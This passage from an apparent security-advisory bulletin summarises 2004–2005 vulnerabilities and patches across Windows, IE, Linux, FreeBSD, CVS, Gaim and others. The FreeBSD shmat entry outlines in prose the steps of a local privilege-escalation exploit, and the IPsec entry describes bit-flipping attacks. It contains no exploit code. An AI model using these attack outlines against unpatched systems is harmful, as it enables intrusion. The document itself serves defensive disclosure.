has been mention. Three of them are critical and make possible remote code execution, one is 
important and the other two are moderate. 

Overview

For more details see:
 http://go.microsoft.com/fwlink/?LinkId=51160

Patches

See: http://go.microsoft.com/fwlink/?LinkId=51160

Microsoft Windows, Internet Explorer, Word and Remote Desktop Vulnerabilities

2005-07-19

Risk level: critical

Type: remote system compromise

Source of info: Microsoft Security Team

Impact

Few days ago, Microsoft has released updates that address critical vulnerabilities in Windows, Office, Internet Explorer. Recently an information about unpatched vulnerabilities in Remote Desktop Protocol has been published. Exploitation of the first three vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code on an affected system. 

Recently Microsoft published information about vulnerability in Remote Desktop Protocol (RDP), that could lead to Denial of Service.

Overview

More information about critical updates can be found in Microsoft Security Bulletin Summary for July, 2005: http://www.microsoft.com/technet/security/bulletin/ms05-jul.mspx

Information regarding DoS attack on Remote Desktop Protocol one can find in 
Microsoft Security Advisory (904797):
http://www.microsoft.com/technet/security/advisory/904797.mspx

Patches

To patch first three vulnerabilities  see:
http://www.microsoft.com/technet/security/bulletin/ms05-jul.mspx
For the last one see workaround in:
http://www.microsoft.com/technet/security/advisory/904797.mspx
and use Windows Updates

Critical bug in Windows - a COM Object (Javaprxy.dll) contains an unspecified vulnerability

2005-07-04

Risk level: critical

Type: Remote code execution

Source of info: sec-consult

Impact

The JVIEW Profiler COM object contains an 
unspecified vulnerability, which may allow a remote 
attacker to execute arbitrary code on a vulnerable system.

Overview

More information could be found on:

http://www.sec-consult.com/184.html
http://www.kb.cert.org/vuls/id/939605
http://www.microsoft.com/technet/security/advisory/903144.mspx
http://secunia.com/advisories/15891/
http://www.securitytracker.com/alerts/2005/Jun/1014329.html
http://www.osvdb.org/displayvuln.php?osvdb_id=17680

Patches

unpatched

Vulnerability in Windows' Server Message Block

2005-06-17

Risk level: critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

A remote code execution vulnerability exists in Server Message Block (SMB) that could allow an attacker who successfully exploited this vulnerable to take complete control of the affected system.

Overview

Because of the nature of this issue, attempts to exploit this vulnerability would most likely result in a denial of service.

Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. By default, the Windows Firewall that is provided as part of Windows XP Service Pack 2 and Windows Server 2003 blocks the affected ports from responding to network-based attempts to exploit this vulnerability. 

For more details see:
http://www.microsoft.com/technet/security/bulletin/MS05-027.mspx

Patches

http://www.microsoft.com/technet/security/bulletin/MS05-027.mspx

Cumulative Security Update for Internet Explorer

2005-06-17

Risk level: critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

Two critical vulnerabilities has been found in Internet Explorer 5.01, 5.5 and 6. One of them alows remote code execution and the second one can lead to information disclosure.

Overview

According to Microsoft Security Bulletin MS05-025:
1) A remote code execution vulnerability exists in Internet Explorer because of the way that it handles PNG images. An attacker could exploit the vulnerability by constructing a malicious PNG image that could potentially allow remote code execution if a user visited a malicious Web site or viewed a malicious e-mail message. An attacker who successfully exploited this vulnerability could take complete control of an affected system.

2) An information disclosure vulnerability exists in Internet Explorer because of the way that it handles certain requests to display XML content. An attacker could exploit the vulnerability by constructing a malicious Web page that could potentially lead to information disclosure if a user visited a malicious Web site or viewed a malicious e-mail message. An attacker who successfully exploited this vulnerability could read XML data from another Internet Explorer domain. However, user interaction is required to exploit this vulnerability.

For details see:
http://www.microsoft.com/technet/security/Bulletin/MS05-025.mspx

Patches

http://www.microsoft.com/technet/security/Bulletin/MS05-025.mspx

Remote Buffer overflow in WebSphere Application Server Console

2005-06-08

Risk level: high

Type: Buffer overflow

Source of info: Application Security, Inc.

Impact

Remote execution of an arbitrary code is possible by unauthorized user. The code may be executed in the context of the server process 

Overview

There is a Unicode buffer overflow in the WebSphere Application Server Administrative Console. The
 security vulnerability exists in the authentication mechanism. The default TCP ports where this 
vulnerability can  be exploited include 9080 (HTTP), 9090 (HTTP) and 9043 (HTTPS).
The authentication process takes place 
only when the 'global security option' is enabled 
in the server. The vulnerability can not be 
exploited if the security option is disabled.

For details see Application Security, Inc advisory:
http://www.appsecinc.com/resources/alerts/general/WEBSPHERE-001.html

Patches

http://www-1.ibm.com/support/docview.wss?rs=180&uid=swg24009775

Critical vulnerabilities in HP-UX

2005-05-27

Risk level: high

Type: many types

Source of info: HP Software Security Response Team

Impact

Hewlett-Packard Software Security Team has informed about three critical vulnerabilities. Two of them
 could be remotely exploited by an unauthorized user to cause a Denial of Service(DoS) and one could be 
exploited  to get remote unauthorized access.

Overview

More detailed information about the issues could be
 found in HP Security bulletins: HPSBUX01165, HPSBUX01164, HPSBUX01137.See: 
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01165
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01164
http://www5.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01137

Patches

http://itrc.hp.com

Linux kernel pktcdvd ioctl break user space limit

2005-05-19

Risk level: medium

Type: Elevation of privilege

Source of info: Xfocus

Impact

Locally exploitable flaw, in the Linux pktcdvd block
device ioctl handler, allows local users to gain 
root privileges and also execute arbitrary code at kernel privilege level.

Overview

The Linux kernel contains pktcdvd block device component. Due to the missing check pktcdvd ioctl handler parameter, the process can break user space limit and  execute arbitrary code at kernel privilege level.

See also:
http://secunia.com/advisories/15392/
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.11.10

Patches

http://www.kernel.org/

Vulnerability Issues with IPsec Configurations

2005-05-10

Risk level: medium

Type: Information leakage

Source of info: NISCC UK

Impact

An unauthenticated remote attacker that is able to intercept and modify IPsec (and ICMP, for some scenarios) communications between security gateways may be able to recover plaintext of the IPsec communications between them.

Overview

Within the IPsec suite, the Encapsulating Security Payload (ESP) protocol provides confidentiality 
for packets by applying encryption algorithms to the packets, along with several other services. 
The Authentication Header (AH) protocol can be used to complement the ESP functionality with 
integrity protection. Both the ESP and AH protocols can be used in either "Transport" or 
"Tunneling" mode. When Cipher Block Chaining (CBC) encryption, which has a well-known set of flaws 
allowing bit-flipping attacks, is used by ESP in tunneling mode to provide confidentiality 
guarantees without proper integrity protection for inner (tunneled) packets, attackers may be able to 
perform the following attacks:

      Destination Address Rewriting: The destination IP address of the inner, encrypted 
packet is modification in a bit-flipping attack. Intermediate gateways may then route the inner 
packet to the modified destination address once the inner packet is recovered.

      IP Options modification: The header length and source address of the inner packet is modified 
by performing a bit-flipping attack on the outer payload. Once the modified inner packet is 
recovered, the structure of the packet may be affected in such a manner that an Internet Control 
Message Protocol (ICMP) Parameter Problem message is generated and sent to the source address of the 
inner packet along with the plaintext payload. This may be intercepted, leading to a recovery of 
the original inner packet plaintext payload.

      Protocol Field modification: In a similar manner to the IP Options modification attack, the 
protocol field and source address of the inner packet are modified in a bit-flipping attack 
against the outer packet payload. An invalid or unusable value in the protocol field may then 
cause a system which is processing a recovered inner packet to generate an ICMP Protocol 
Unreachable message. This ICMP message is then sent back to the (modified) source address with 
the plaintext payload of the inner packet, which may be intercepted in order to recover the 
plaintext.

For further details see:
http://www.niscc.gov.uk/niscc/docs/re-20050509-00385.pdf?lang=en
http://jvn.jp/niscc/NISCC-004033/index.html
http://www.ietf.org/ids.by.wg/ipsec.html

Patches

See vendor specific solutions at your vendor's website.

New cvs packages for Debian fix unauthorised repository access

2005-04-28

Risk level: high

Type: remote system compromise

Source of info: Debian Security Team

Impact

Remote exploitable bugs in Concurrent Versions System (CVS) server have been discovered.

Overview

According to Debian Security Adviosry:
Maks Polunin and Alberto Garcia discovered independently that using the pserver access method 
in connection with the repouid patch that Debian uses it is possible to bypass the password and
gain access to the repository in question (CAN-2004-1342).

Moreover, Alberto Garcia discovered that a remote user can cause the cvs server to crash when the 
cvs-repouids file exists but does not contain a mapping for the current repository, which can be 
used as a denial of service attack.

Patches

For details see:
http://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00097.html

Multiple flaws in Oracle Database Server

2005-04-27

Risk level: high

Type: many types

Source of info: NGSSoftware Insight Security

Impact

Potential consequences may include the remote execution of arbitrary code, disclosure of 
sensitive information, and denial-of-service conditions. Database compromises may result in the 
diclosure of sensitive personal information, such as credit card numbers, social security numbers, 
and health and patient information.

Overview

David Litchfield of NGSSoftware has discovered multiple high risk vulnerabilities in Oracle's Database Server. Versions affected include:

Oracle Database 10g Release 1 Version 10.1.0.2, 10.1.0.3, 10.1.0.3.1 and 10.1.0.4
Oracle9i Database Server Release 2, versions 9.2.0.5 and 9.2.0.6
Oracle9i Database Server Release 1, versions 9.0.1.4, 9.0.1.5 and 9.0.4
Oracle8i Database Server Release 3, version 8.1.7.4

NGSSoftware are going to withhold details about these flaws for three months. Full details will be published on the Tuesday, 12th of July 2005. This three month window will allow Oracle database administrators the time needed to test and apply the patch set before the details are released to the general public. This reflects NGSSoftware's new approach to responsible disclosure. 

NGSSQuirreL for Oracle, NGSSoftware's advanced vulnerability assessment scanner and security manager for Oracle, has been updated to check for and positively identify these flaws in Oracle database servers on the network. More information about NGSSQuirreL for Oracle can be found at http://www.ngssoftware.com/squirrelora.htm. 

Patches

http://www.oracle.com/technology/deploy/security/pdf/cpuapr2005.pdf
http://metalink.oracle.com/

sendfile() system call - kernel memory disclosure

2005-04-20

Risk level: medium

Type: Buffer overflow

Source of info: FreeBSD Project Team

Impact

A local user could create a large file and truncate
 it while transferring it to himself, thus obtaining 
a copy of portions of system memory 
to which he would normally not have access.Such memory might contain sensitive information.

Overview

The sendfile(2) system call allows a server application (such as an HTTP
or FTP server) to transmit the contents of a file over a network
connection without first copying it to application memory.  High performance servers such as Apache and 
ftpd use sendfile.

If the file being transmitted is truncated after the transfer has started but before it completes, 
sendfile(2) will transfer the contents of more or less random portions of kernel memory in lieu of the
missing part of the file.

Patches

For patches see:
ftp://ftp.freebsd.org/pub/CERT/advisories/FreeBSD-SA-05:02.sendfile.asc

Bug in Mozilla Firefox - remote code execution

2005-04-15

Risk level: high

Type: Remote code execution

Source of info: Kohei Yoshino

Impact

According to information provided by  Kohei Yoshino and published in  
Mozilla Foundation Security Advisory 2005-39 and US-CERT VU#519317 announcment, 
a remote attacker may be able to install malicious code on or read protected information 
from a vulnerable system.
 

Overview

Sites can use the _search target to open links in
 the Firefox sidebar. Two missing security checks 
allow malicious scripts to first open a privileged 
page (such as about:config) and then inject script 
using a javascript: url. This could be used to 
install malicious code or steal data without user 
interaction.

Patches

Bugs have been removed in Firefox 1.0.3
http://www.mozilla.org/products/firefox/all.html

Remotly exploitable bug in XFree86

2004-02-15

Risk level: high

Type: Buffer overflow

Source of info: iDEFENSE Labs

Impact

Exploitation of a buffer overflow in The XFree86 X Window System allows local attackers to gain root privileges.  

Overview

Greg MacManus, of iDEFENSE Labs, reports finding several potentially exploitable buffer overflows in XFree86's font code. David Dawes provided a patch to fix these, and other, errors.

The vulnerability specifically exists in the use of the CopyISOLatin1Lowered() function with the font_name buffer. While parsing a font.alias file, the ReadFontAlias() function uses the
length of the input string as the limit for the copy, instead of the size of the storage buffer. A malicious user may craft a malformed font.alias file, causing a buffer overflow upon parsing and eventually leading to the execution of arbitrary code.

Successful exploitation requires that an attacker be able to execute commands in the X11 subsystem. This can be done either by having console access to the target or through a remote exploit against any X client program such as a web-browser, mail-reader or game. Successful
exploitation yields root access.

iDEFENSE has confirmed the existence of this vulnerability in XFree86 versions 4.1.0 to the current version 4.3.0. It is suspected that
earlier versions are vulnerable as well. 

Patches

ftp://ftp.xfree86.org/pub/XFree86/4.3.0/fixes/fontfile.diff 

SGI has released security update #10 for Altix systems

2004-02-15

Risk level: medium

Type: many types

Source of info: CERT

Impact

SGI has released Patch 10050: SGI Advanced Linux Environment security update #10, which includes updated RPMs for SGI ProPack v2.3 for the SGI
Altix family of systems.

Overview

The patch has been released in response to the following security issues:
-Updated slocate packages fix vulnerabilities
 http://rhn.redhat.com/errata/RHSA-2004-041.html
-Updated util-linux packages fix information  leak
 http://rhn.redhat.com/errata/RHSA-2004-056.html
-Updated mc packages resolve buffer overflow vulnerability
 http://rhn.redhat.com/errata/RHSA-2004-035.html
-Updated NetPBM packages fix multiple temporary file vulnerabilities
 http://rhn.redhat.com/errata/RHSA-2004-031.html
-Updated Gaim packages fix security vulnerabilities
 http://rhn.redhat.com/errata/RHSA-2004-045.html
-Updated mailman packages close DoS vulnerability
 http://rhn.redhat.com/errata/RHSA-2004-019.html

Patches

Patch 10050 is available from 
http://support.sgi.com/ and
ftp://patches.sgi.com/support/free/security/patches/ProPack/2.3/
The individual RPMs from Patch 10050 are available from:
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/RPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/SRPMS

Remote crash in Mutt

2004-02-14

Risk level: high

Type: remote crash

Source of info: Mandrake Security Team

Impact

A bug in mutt was reported by Neils Heinen that could allow a remote attacker to send a carefully crafted mail message that can cause mutt to segfault and possibly execute arbitrary code as the user running mutt.

Overview

Mutt is a text mode mail user agent. Mutt supports color, threading, arbitrary key remapping, and a lot of customization.

It was discovered that certain messages would cause mutt to crash. Mutt 1.4.2 fixes this bug

Patches

For Mandrake packages use a suitable mirror
from the list on:
http://www.mandrakesecure.net/en/ftp.php
And install updated packages:
 Updated Packages:
  
 Corporate Server 2.1:
 9bc44748af1cb08ab42af19ae66b2bd3  corporate/2.1/RPMS/mutt-1.4.1i-1.2.C21mdk.i586.rpm
 4988bcd3dfada99b7aba26f65662c0c0  corporate/2.1/SRPMS/mutt-1.4.1i-1.2.C21mdk.src.rpm

 Corporate Server 2.1/x86_64:
 9ad9b5c92a2af1e7a9ecb4f4dbadfd3f  x86_64/corporate/2.1/RPMS/mutt-1.4.1i-1.2.C21mdk.x86_64.rpm
 4988bcd3dfada99b7aba26f65662c0c0  x86_64/corporate/2.1/SRPMS/mutt-1.4.1i-1.2.C21mdk.src.rpm

 Mandrake Linux 9.1:
 bd20ea8a4ed852602e269e1ec637e822  9.1/RPMS/mutt-1.4.1i-1.2.91mdk.i586.rpm
 4bfe4f092a63e96ada255bfc6e5a4c0e  9.1/SRPMS/mutt-1.4.1i-1.2.91mdk.src.rpm

 Mandrake Linux 9.1/PPC:
 ab9886dbc9a906669c2827bf1b0f51e7  ppc/9.1/RPMS/mutt-1.4.1i-1.2.91mdk.ppc.rpm
 4bfe4f092a63e96ada255bfc6e5a4c0e  ppc/9.1/SRPMS/mutt-1.4.1i-1.2.91mdk.src.rpm

 Mandrake Linux 9.2:
 6e3c3843611f49a20894f1cb0c64c760  9.2/RPMS/mutt-1.4.1i-3.1.92mdk.i586.rpm
 7a38e74fb7e1b11f1add65ac8f5a1e2a  9.2/SRPMS/mutt-1.4.1i-3.1.92mdk.src.rpm

 Mandrake Linux 9.2/AMD64:
 a3aa8bcdd20b8fb56c366818a10f3a9d  amd64/9.2/RPMS/mutt-1.4.1i-3.1.92mdk.amd64.rpm
 7a38e74fb7e1b11f1add65ac8f5a1e2a  amd64/9.2/SRPMS/mutt-1.4.1i-3.1.92mdk.src.rpm

Multiple Vulnerabilities in Microsoft ASN.1 Library

2004-02-11

Risk level: critical

Type: many types

Source of info: CERT

Impact

   An unauthenticated, remote attacker could execute arbitrary code with  the privileges of the process using the ASN.1 library. In the case of most server and authentication applications, an attacker could gain SYSTEM privileges.

Overview

Multiple integer overflow vulnerabilities in the Microsoft Windows ASN.1 parser library could allow an unauthenticated, remote attacker to execute arbitrary code with SYSTEM privileges.

Microsoft Security Bulletin MS04-007 announces a patch for multiple vulnerabilities in the Microsoft Windows ASN.1 library (msasn1.dll).  According to information from eEye Digital Security, the vulnerabilities involve integer overflows and other flaws in   integer arithmetic.    
  
Any application that loads the ASN.1 library could serve as an attack vector. In particular, ASN.1 is used by a number of cryptographic and authentication services such as digital certificates (x.509), Kerberos, NTLMv2, SSL,and TLS. Both client and server systems are affected. The Local Security Authority Subsystem (lsass.exe) and a component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1 library.

Patch your system as soon as possible.

Patches

Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-007:
http://microsoft.com/technet/security/bulletin/MS04-007.asp

Internet Explorer/Outlook double null character DoS

2004-02-11

Risk level: medium

Type: DoS

Source of info: ACROS Security

Impact

For some web servers, two null (%00) characters appended after the host
name cause Internet Explorer or Outlook to consume 100% CPU and freeze.
This issue can be  exploited by forcing the user's browser to open a
hostile URL, either by  setting up a malicious web site and luring the
user into visiting it or sending a malicious HTML e-mail to a user using
Outlook. Once Internet  Explorer or Outlook is frozen, the user must kill
iexplore.exe or outlook.exe process respectively via task manager in order
to resume normal IE/Outlook use.

Overview

There's probably some flawed assumption in the code responsible for
parsing the requested URL, specifically in parsing the host name, that
leads to a dead loop consuming 100% CPU. This issue, however, does not
seem to occur with all host names. Furthermore, we discovered that the
sensitivity to double-null suffix obviously depends on the "Do not save
encrypted pages to disk" option being turned off (which is default).

As far as Outlook is concerned, its susceptibility to this issue is not
surprising, as Outlook is using Internet Explorer's browser object for
rendering HTML e-mail. Outlook 2003 by default prevents remote HTML images
from being displayed due to privacy reasons, which effectively prevents an
e-mail borne attack unless the sender is listed in "safe senders" list.

Our tests have shown that the computer under attack must be connected to
Internet (directly, not via http proxy) in order for this issue to occur.

Finally, once IE or Outlook is frozen, Windows Explorer often freezes as
well, possibly due to calling the same piece of code that is caught in an
endless loop.

Patches

An official patch MS04-004 was released, which fixes this issue:
http://www.microsoft.com/technet/security/bulletin/ms04-004.asp.

Possible unauthorized access to Check Point Firewall-1

2004-02-06

Risk level: high

Type: security features compromise

Source of info: CERT

Impact

   Several versions of Check Point Firewall-1 contain a vulnerability that allows remote attackers to execute arbitrary code with administrative   privileges typically "SYSTEM"
   or "root". This allows the attacker to take control of the firewall, and in some cases, to also control the server it runs on. Failed attempts to exploit this vulnerability may cause the firewall to crash.

Overview

 The Application Intelligence (AI) component of Check Point Firewall-1 is an application proxy that scans traffic for application layer attacks once it has passed through the firewall at the network level. Earlier versions of Firewall-1 include the HTTP Security Server, which
provides similar functionality.

 Both the AI and HTTP Security Server features contain an HTTP parsing vulnerability that is triggered by sending an invalid HTTP request through the firewall. When Firewall-1 generates an error message in response to the invalid request, a portion of the input supplied by the attacker is included in the format string for a call to sprintf().

 Researchers at Internet Security Systems have determined that it is possible to exploit this format string vulnerability to execute commands on the firewall. The researchers have also determined that this vulnerability can be exploited as a heap overflow, which would allow an attacker to execute arbitrary code. In either case, the commands or code executed by the attacker would run with administrative privileges, typically "SYSTEM" or "root". For more information, please see the ISS advisory at:
        http://xforce.iss.net/xforce/alerts/id/162

Check Point has published a "Firewall-1 HTTP Security Server Update" that modifies the error return strings used when an invalid HTTP request is detected. For more information, please see the Check Point bulletin at:
http://www.checkpoint.com/techsupport/alerts/security_server.html

Patches

See the Check Point bulletin at:
http://www.checkpoint.com/techsupport/alerts/security_server.html

Shared memory reference count overflow in shmat()

2004-02-05

Risk level: medium

Type: local system compromise

Source of info: PINE Digital Security

Impact

Local users can elevate their privileges in FreeBSD with System V Shared Memory.

Overview

The shmat(2) function maps a shared memory segment, previously created with the shmget(2) function, into the address space of the calling process.

This function is implemented in the sysv_shm.c file:

        -- sysv_shm.c lines 317-322 --
                vm_object_reference(shm_handle->shm_object);
         rv = vm_map_find(&p->p_vmspace->vm_map,
              shm_handle->shm_object,
              0, &attach_va, size,
              (flags & MAP_FIXED) ? 0 : 1,
                                prot, prot, 0);

        if (rv != KERN_SUCCESS) return ENOMEM;

        -- end of code snippet --

The shmat(2) function first increases the reference count of the underlying vm_object and then attempts to insert the vm_object into the process address space.

The vulnerability occurs because the shmat(2) function forgets  to decrease the reference count when the vm_map_find function returns failure.

Since the caller of shmat(2) can specify the address at which the segment should be mapped it is possible to have vm_map_find return failure and thus end up with stale references.

Exploitability

This vulnerability can exploited (reliably) by local users:

One would first create a shared memory segment using the shmget(2)function and create two seperate mappings at different locations in the process address space using the shmat(2) function.

After making around 232-2 (invalid) calls to the shmat(2) function the reference count of the underlying vm_object will wraparound to 1.

After deleting one of our mappings using the shmdt(2) function the underlying vm_object will be freed and we will still have one (extranous) mapping hanging around.

One would then invoke some magic trickery and execute a suid binary which will reuse the freed vm_object for its stack segment.

At this point one could write directly into the stack segment of the suid binary (using the extranous mapping) and thus escalate ones privileges easily.

Patches

ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:02/shmat.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:02/shmat.patch.asc

Multiple Vulnerabilities in Microsoft Internet Explorer

2004-02-02

Risk level: high

Type: many types

Source of info: CERT

Impact

   Microsoft Internet Explorer (IE) contains multiple vulnerabilities,
   the most serious of which could allow a remote attacker to execute
   arbitrary code with the privileges of the user running IE

Overview

Microsoft Security Bulletin MS04-004 describes three vulnerabilities
   in Internet Explorer. These vulnerabilities are listed below. More
   detailed information is available in the individual vulnerability
   notes. Note that in addition to IE, any applications that use the IE
   HTML rendering engine to interpret HTML documents may present
   additional attack vectors for these vulnerabilities.

   VU#784102 - Microsoft Internet Explorer Travel Log Cross Domain
   Vulnerability

   A cross-domain scripting vulnerability exists in the Travel Log
   functionality of Internet Explorer. This vulnerability could allow a
   remote attacker to execute arbitrary script in a different domain,
   including the Local Machine Zone.
   (Other resources: CAN-2003-01026)

   VU#413886 - Microsoft Internet Explorer Drag-and-Drop Operation
   Vulnerability 

   Internet Explorer allows remote attackers to direct drag and drop
   behaviors and other mouse click actions by using method caching
   (SaveRef) to access the window.moveBy method.
   (Other resources: CAN-2003-01027)

   VU#652278 - Microsoft Internet Explorer does not properly display URLs

   Microsoft Internet Explorer does not properly display the location of
   HTML documents. An attacker could exploit this behavior to mislead
   users into revealing sensitive information.
   (Other resources: CAN-2003-01025)

Impact

   These vulnerabilities have different impacts, ranging from disguising
   the true location of a URL to executing arbitrary commands or code.
   Please see the individual vulnerability notes for specific
   information. The most serious of these vulnerabilities (VU#784102)
   could allow a remote attacker to execute arbitrary code with the
   privileges of the user running IE. The attacker could exploit this
   vulnerability by convincing the user to access a specially crafted
   HTML document, such as a web page or HTML email message. No user
   intervention is required beyond viewing the attacker's HTML document
   with IE.

 Apply the appropriate patch as specified by Microsoft Security Bulletin MS04-004.

   Note: The fix included in MS04-004 for VU#652278 may cause sites that use URLs of the form "username:password@www.example.com" to break.
   This change, along with workarounds for users and administrators of such sites, is covered in Microsoft KB Article 834489.

Patches

Microsoft Security Bulletin MS04-004:
<http://microsoft.com/technet/security/bulletin/MS04-004.asp>

Vulnerabilities in Gaim instant-messaging client

2004-01-29

Risk level: medium

Type: remote system compromise

Source of info: SuSE Security Team

Impact

Gaim is a multi-protocol instant-messaging client. Stefan Esser found 12 vulnerabilities in gaim that can lead to a remote system compromise
with the privileges of the user running GAIM.

Overview

The GAIM package that SUSE LINUX ships is affected by just two of these bug:
        - Yahoo Packet Parser Overflow
        - HTTP Proxy Connect Overflow

    The first vulnerability is easy to exploit and results in a classic stack
    overflow which can be used to execute arbitrary code.
    The latter vulnerability requires the gaim client use a HTTP proxy under
    the control of the attacker. The exploitation of this bug results in
    arbitrary code execution too.

    There is no known workaround.

    Please download the update package for your distribution and verify its
    integrity by the methods listed in section 3) of this announcement.
    Then, to apply the update use the command "rpm -Fhv file.rpm".
    Our maintenance customers are being notified individually. The packages
    are being offered to install from the maintenance web.

Patches

  SuSE-9.0:
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/gaim-0.67-65.i586.rpm
      09f8d12dd52e246cf32dca8ad3374f39
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/gaim-0.67-65.i586.patch.rpm
      3a633e341b9e56facdbe0250b55dd33a
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/gaim-0.67-65.src.rpm
      5ee6a86077c0297a64815532782f7a54

    SuSE-8.2:
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/gaim-0.59.8-60.i586.rpm
      7a269744304f72bf951c7bd6974560f2
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/gaim-0.59.8-60.i586.patch.rpm
      e7b18f0da02c1c4392dc1b03e835a827
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/gaim-0.59.8-60.src.rpm
      ae7d7b1c9735696244547a0d6a5ee92e

    SuSE-8.1:
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/gaim-0.59-158.i586.rpm
      22b1d4be5737906f8ff0975918279034
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/gaim-0.59-158.i586.patch.rpm
      7644020869e92cc980b881efebf9d617
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/gaim-0.59-158.src.rpm
      cd1532f71a79ed32d016d456a844ff4b

    SuSE-8.0:
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/gnm3/gaim-0.50-187.i386.rpm
      7dcb581b78bf8ab61e82bf0836a4357e
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/gnm3/gaim-0.50-187.i386.patch.rpm
      5a6f596538edc56e0b3a70a23200c21e
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/gaim-0.50-187.src.rpm
      d38c8da629941eecef7f75d6a5ea9e80

Updated cvs resolves security vulnerability

2004-01-28

Risk level: medium

Type: many types

Source of info: Fedora Legacy Team

Impact

Updated cvs packages are now available that fix a security vulnerability which may allow cvs to attempt to create files and directories in the root file system, as well as prevent the cvsd from retaining root privileges after a user login.

Overview

CVS (Concurrent Version System) is a version control system that can record the history of your files (usually, but not always, source code). CVS only stores the differences between versions, instead of every version of every file you have ever created. CVS also keeps a log of who, when, and why changes occurred.

A flaw was found in versions of CVS prior to 1.11.10 where a malformed module request could cause the CVS server to attempt to create files or
directories at the root level of the file system. However, normal file system permissions would prevent the creation of these misplaced directories. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CAN-2003-0977 to this issue.

Another flaw was found that would allow the cvsd process to continue to run as root after a user login.  Previously, any user with the ability to
write the CVSROOT/passwd file could execute arbitrary code as the root user on systems with CVS pserver access enabled.

Users of cvs should update to these update packages, which contain a backported security patch that corrects this issue.

Fedora Legacy would like to thank Seth Vidal, Jason Rohwedder and Christian Pearce for providing a backported fix for Red Hat Linux 7.2, 7.3, and 8.0.

Patches

Red Hat Linux 7.2:

SRPMS:
http://download.fedoralegacy.org/redhat/7.2/updates/SRPMS/cvs-1.11.1p1-9.7.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/7.2/updates/i386/cvs-1.11.1p1-9.7.legacy.i386.rpm

Red Hat Linux 7.3:

SRPMS:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/cvs-1.11.1p1-9.7.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/cvs-1.11.1p1-9.7.legacy.i386.rpm

Red Hat Linux 8.0:

SRPMS:
http://download.fedoralegacy.org/redhat/8.0/updates/SRPMS/cvs-1.11.2-9.legacy.src.rpm
i386:
http://download.fedoralegacy.org/redhat/8.0/updates/i386/cvs-1.11.2-9.legacy.i386.rpm

Updated mc packages fix buffer overflow vulnerability

2004-01-28

Risk level: high

Type: Buffer overflow

Source of info: Mandrake Security Team

Impact

A buffer overflow was discovered in mc's virtual filesystem code.
 This vulnerability could allow remote attackers to execute arbitrary
 code during symlink conversion.
 
 

Overview

The updated packages have been patched to correct the problem.

Patches

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 A list of FTP mirrors can be obtained from:

  http://www.mandrakesecure.net/en/ftp.php

Updated tcpdump packages fix several vulnerabilities

2004-01-28

Risk level: high

Type: many types

Source of info: Mandrake Security Team

Impact

A number of vulnerabilities were discovered in tcpdump versions prior
 to 3.8.1 that, if fed a maliciously crafted packet, could be exploited
 to crash tcpdump or potentially execute arbitrary code with the
 privileges of the user running tcpdump.

Overview

These vulnerabilities include:
 
 An infinite loop and memory consumption processing L2TP packets
 (CAN-2003-1029).
 
 Infinite loops in processing ISAKMP packets (CAN-2003-0989,
 CAN-2004-0057).
 
 A segmentation fault caused by a RADIUS attribute with a large length
 value (CAN-2004-0055).
 
 The updated packages are patched to correct these problem.

Patches

To upgrade automatically use MandrakeUpdate or urpmi.  The verification of md5 checksums and GPG signatures is performed automatically for you.
A list of FTP mirrors can be obtained from:
  http://www.mandrakesecure.net/en/ftp.php

Updated Packages:
 Corporate Server 2.1:
 c9c3cb66d49d3c61c09db1df364309aa  corporate/2.1/RPMS/tcpdump-3.7.2-2.1.C21mdk.i586.rpm
 a0731e1d0f8bb67e27796486ee0ac6de  corporate/2.1/SRPMS/tcpdump-3.7.2-2.1.C21mdk.src.rpm

 Corporate Server 2.1/x86_64:
 3eba37e4c75f54916c3c15b126710c43  x86_64/corporate/2.1/RPMS/tcpdump-3.7.2-2.1.C21mdk.x86_64.rpm
 a0731e1d0f8bb67e27796486ee0ac6de  x86_64/corporate/2.1/SRPMS/tcpdump-3.7.2-2.1.C21mdk.src.rpm

 Mandrake Linux 9.1:
 aa337b3beb1371a5ceace20db36c5dfa  9.1/RPMS/tcpdump-3.7.2-2.1.91mdk.i586.rpm
 99e8f3cb2c6cc748ca8c8d24ab555029  9.1/SRPMS/tcpdump-3.7.2-2.1.91mdk.src.rpm

 Mandrake Linux 9.1/PPC:
 df878fa0b993bcc53cb852a4b3a6b0bb  ppc/9.1/RPMS/tcpdump-3.7.2-2.1.91mdk.ppc.rpm
